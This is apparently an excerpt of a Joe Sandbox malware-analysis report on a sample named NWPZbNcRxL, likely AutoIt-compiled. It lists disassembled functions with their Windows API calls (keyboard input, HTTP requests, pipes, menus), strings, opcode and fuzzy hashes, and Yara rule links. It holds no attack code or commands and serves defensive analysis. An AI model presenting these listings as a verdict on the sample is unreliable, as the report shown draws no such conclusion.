Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 7ab1756b1b52eea2269aecd997291079406a0dc3a16f2606f8cc46b53d750e62
Instruction ID: 8cfeca2c437da8f56193c6459f251342d62f3ca52d0043d6ff63bc409005a1ad
Opcode Fuzzy Hash: 7ab1756b1b52eea2269aecd997291079406a0dc3a16f2606f8cc46b53d750e62
Instruction Fuzzy Hash: 9AF05E36540A12EBD7121B64ED4CBDE7729FF45702B10063BF603D10A1CB766912CB50

Function 00C68992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C6899D
UnloadUserProfile.USERENV(?,?), ref: 00C689A9
CloseHandle.KERNEL32(?), ref: 00C689B2
CloseHandle.KERNEL32(?), ref: 00C689BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00C689C3
HeapFree.KERNEL32(00000000), ref: 00C689CA

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 1e95c315ee17b5e7dbd14053c5972e87d6e313eaf45be1d1be4b60e74b6592be
Instruction ID: c2ae64abe0ab52dfd0149d9321a0959099f70773d5231b3415b0c11393dad4a1
Opcode Fuzzy Hash: 1e95c315ee17b5e7dbd14053c5972e87d6e313eaf45be1d1be4b60e74b6592be
Instruction Fuzzy Hash: 01E05276104505FBDA021FF5EC0CB5EBB69FB89762B60863AF219C1470CB369462DB90

Function 00C885ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C88613
CharUpperBuffW.USER32(?,?), ref: 00C88722
VariantClear.OLEAUT32(?), ref: 00C8889A

Part of subcall function 00C77562: VariantInit.OLEAUT32(00000000), ref: 00C775A2
Part of subcall function 00C77562: VariantCopy.OLEAUT32(00000000,?), ref: 00C775AB
Part of subcall function 00C77562: VariantClear.OLEAUT32(00000000), ref: 00C775B7

Strings

AUTOIT.ERROR, xrefs: 00C88728
Incorrect Parameter format, xrefs: 00C8864B, 00C8880D

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 31bdf6dd097a6017a77e5ddae26decd7d7c2180973d67dec0e3b257b8d5f4c34
Instruction ID: 8ecf91ae908ef6caee9fce32247410df4f05db45ff1b59ecc3127ee0c1420585
Opcode Fuzzy Hash: 31bdf6dd097a6017a77e5ddae26decd7d7c2180973d67dec0e3b257b8d5f4c34
Instruction Fuzzy Hash: 0F918E75604301DFCB10EF24C48495AB7F4EF89718F54892EF89A8B3A1DB31E94ADB52

Function 00C72A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9

_memset.LIBCMT ref: 00C72B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C72BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C72C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C72C97

Strings

0, xrefs: 00C72B73

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 7a2b2ff69c0d672a4e6c313a12bcd331ee6fe5103afa0c9d4c3e3e8a9c46fc56
Instruction ID: 55d391421028701d3cb6df4f64a918b47cdc09777377595725d208e275443515
Opcode Fuzzy Hash: 7a2b2ff69c0d672a4e6c313a12bcd331ee6fe5103afa0c9d4c3e3e8a9c46fc56
Instruction Fuzzy Hash: C951C0716083019FE7269E28C845A6FB7E8EF65350F148A2DF8A9D3291DB70CE44E752

Function 00C6D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C6D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C6D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C6D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C6D69D

Strings

DllGetClassObject, xrefs: 00C6D610

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 245593c9612ffcee14a12ea4dc5162536ba9e6061e1aa34a0f5da2f4b6faaca6
Instruction ID: e3df6da83d9ff2d7a7f1bbd328ae341710044ec8350ad306ef528632bbb14f6f
Opcode Fuzzy Hash: 245593c9612ffcee14a12ea4dc5162536ba9e6061e1aa34a0f5da2f4b6faaca6
Instruction Fuzzy Hash: 68417DB1A00205EFDB25CF54C8C8B9A7BA9EF44314F1585ADF90A9F205D7B1DA40CBA0

Function 00C72753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C727C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C727DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00C72822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CD5890,00000000), ref: 00C7286B

Strings

0, xrefs: 00C727B5

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: b4886ae3501a577992a5e6173739bcd49a52a64aefb30cf3e387906e15ae284e
Instruction ID: e576adbed5139c5e706b166f7d84e177493b3482da9f4b481c64246e56921a76
Opcode Fuzzy Hash: b4886ae3501a577992a5e6173739bcd49a52a64aefb30cf3e387906e15ae284e
Instruction Fuzzy Hash: CB41AE722043419FD720DF25C884F5ABBE8EF85314F148A2EF8A9972D2D731A905DB63

Function 00C70AD6 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C70B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00C70B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C70BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C70BFB

Strings

w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0, xrefs: 00C70B5D

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID: w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0
API String ID: 432972143-4167011992
Opcode ID: 5358b3009b71603e5b8b9b8f2b69210876832f0780f0815f6e8cd7415f594ee4
Instruction ID: c8e90a54c1edde30a9a8a22de034e1e8c65c3c5525f0de3d0be6b8239b9bef3e
Opcode Fuzzy Hash: 5358b3009b71603e5b8b9b8f2b69210876832f0780f0815f6e8cd7415f594ee4
Instruction Fuzzy Hash: 5C315A70D40608EFFF308B65CC09BFEBBA6AB45318F28C25AF4A8921D1C3748B519751

Function 00C70C11 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00C70C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00C70C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00C70CE1
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00C70D33

Strings

w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0, xrefs: 00C70C9F

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID: w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0
API String ID: 432972143-4167011992
Opcode ID: c0a0f312a690ecf9a8225a016f35da37617fd5105a2d460325785fab9e07e148
Instruction ID: 6ea1c11c645f8b178377c4cba8f4ac76371fce61b4900f784f56251565be680c
Opcode Fuzzy Hash: c0a0f312a690ecf9a8225a016f35da37617fd5105a2d460325785fab9e07e148
Instruction Fuzzy Hash: F7312630940318EEFF318B6988097FEBBAAAB45310F24C35FE4A9921D1C3759A55D762

Function 00C8D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C8D7C5

Part of subcall function 00C1784B: _memmove.LIBCMT ref: 00C17899

Strings

stdcall, xrefs: 00C8D847
winapi, xrefs: 00C8D836
cdecl, xrefs: 00C8D81C
none, xrefs: 00C8D8A0

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: c6ed0eed1dc814a484a183d765a918a96083acf9788688969f73f16cc28458cd
Instruction ID: ae17c69f4bd93bddf0b601a9278aa2219ea9e96686ff9c30ae3fbe0ac3efc6d9
Opcode Fuzzy Hash: c6ed0eed1dc814a484a183d765a918a96083acf9788688969f73f16cc28458cd
Instruction Fuzzy Hash: AF319E71904619ABCF00EF54C8559EEB3B4FF05324F108669F836A76D1DB31AE05DB80

Function 00C68E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22

Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C68F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C68F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00C68F57

Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06

Strings

ListBox, xrefs: 00C68ED3
ComboBox, xrefs: 00C68E9E

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 246f0b6fce253749ff58aad1d8b738dfd1383e1aa878fa30ec6f194dc5bc1d14
Instruction ID: 141653f875dc701d0cec3c2c55aaccf1edb2fc41de34cbb6c2bb22f1d4ab7b16
Opcode Fuzzy Hash: 246f0b6fce253749ff58aad1d8b738dfd1383e1aa878fa30ec6f194dc5bc1d14
Instruction Fuzzy Hash: 4021E471A04108BEDB24ABB0DC89DFFB779DF46320F14462AF421A71E1DF35494AAA50

Function 00C8182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C81872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C818A2
InternetCloseHandle.WININET(00000000), ref: 00C818E9

Part of subcall function 00C82483: GetLastError.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C82498
Part of subcall function 00C82483: SetEvent.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C824AD

Strings

, xrefs: 00C81893

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 9773757eb200906c178730e271be92a35d0cb03a3e6e3b9e405a42c85be4ee85
Instruction ID: 748d8bc9666c824815bab96fa9b8f4b1da43192cc14803bf6ee433c22effcc26
Opcode Fuzzy Hash: 9773757eb200906c178730e271be92a35d0cb03a3e6e3b9e405a42c85be4ee85
Instruction Fuzzy Hash: 3E21B0B1510208BFEB11AB61CC8AFBF77EDEB48749F14412AF805D7180DB208E0667B4

Function 00C963E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C11D73
Part of subcall function 00C11D35: GetStockObject.GDI32(00000011), ref: 00C11D87
Part of subcall function 00C11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C11D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C96461
LoadLibraryW.KERNEL32(?), ref: 00C96468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C9647D
DestroyWindow.USER32(?), ref: 00C96485

Strings

SysAnimate32, xrefs: 00C9643C

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 8d1ddd41133344ffccb1b468bda381952ba8d5f7e73b4ee5d508719129b1e3e4
Instruction ID: 65daf98cc523315c56ca148d0b75c97c527f7747b0e9370b9549bc884331e71e
Opcode Fuzzy Hash: 8d1ddd41133344ffccb1b468bda381952ba8d5f7e73b4ee5d508719129b1e3e4
Instruction Fuzzy Hash: C7216D71210205BFEF108FA4DC98FBB77ADEB59764F104629FA60921E0D771DC51A760

Function 00C76D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00C76DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C76DEF
GetStdHandle.KERNEL32(0000000C), ref: 00C76E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C76E3B

Strings

nul, xrefs: 00C76E36

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: b760179bc1e2c045c5dfe079b50ce25c33b5ee8e9e36bddc1a11457280729cb9
Instruction ID: b46c799e0b1fe9950c99e2e23d9ac156278f2d9d4eba9f5cd77be016285c7d77
Opcode Fuzzy Hash: b760179bc1e2c045c5dfe079b50ce25c33b5ee8e9e36bddc1a11457280729cb9
Instruction Fuzzy Hash: CA218174600609AFDB309F29DC05B9E7BB4EF54720F20862AFDB4D72D0D77099519B60

Function 00C76E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00C76E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C76EBB
GetStdHandle.KERNEL32(000000F6), ref: 00C76ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C76F06

Strings

nul, xrefs: 00C76F01

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 7fedb044d3113df262f231ed60f07608639ef2cf42a80d9fca25c56654fcd849
Instruction ID: bc211b6a0748a718c7267531dec0bbae286b3f01fb9f9b03968064177a87ef9f
Opcode Fuzzy Hash: 7fedb044d3113df262f231ed60f07608639ef2cf42a80d9fca25c56654fcd849
Instruction Fuzzy Hash: 4321A475500B059BDB209F69DC04B9A77A8EF45720F208A1AFCB5D72D0D770A951C761

Function 00C7AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C7AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C7ACA8
__swprintf.LIBCMT ref: 00C7ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,00C9F910), ref: 00C7ACFF

Strings

%lu, xrefs: 00C7ACBB

Memory Dump Source

Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 9376bcb3b07b9c7aa4d9a1f02952d158c08e18c0a703ee26dbf2e986ad18d641
Instruction ID: 0dd710abfd01a30efeac01f0d2be8e2e64b4252dc5ea9f0e922a6566da8e7cc0
Opcode Fuzzy Hash: 9376bcb3b07b9c7aa4d9a1f02952d158c08e18c0a703ee26dbf2e986ad18d641
Instruction Fuzzy Hash: 6D214131A00109EFCB10DF65C945EEE7BB8FF89714B1080A9F909DB251DA31EA45EB61

Function 00C71AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C71B19

Strings

EXISTS, xrefs: 00C71B41
KEYS, xrefs: 00C71B30
REMOVE, xrefs: 00C71B1F
APPEND, xrefs: 00C71B52

Memory Dump Source

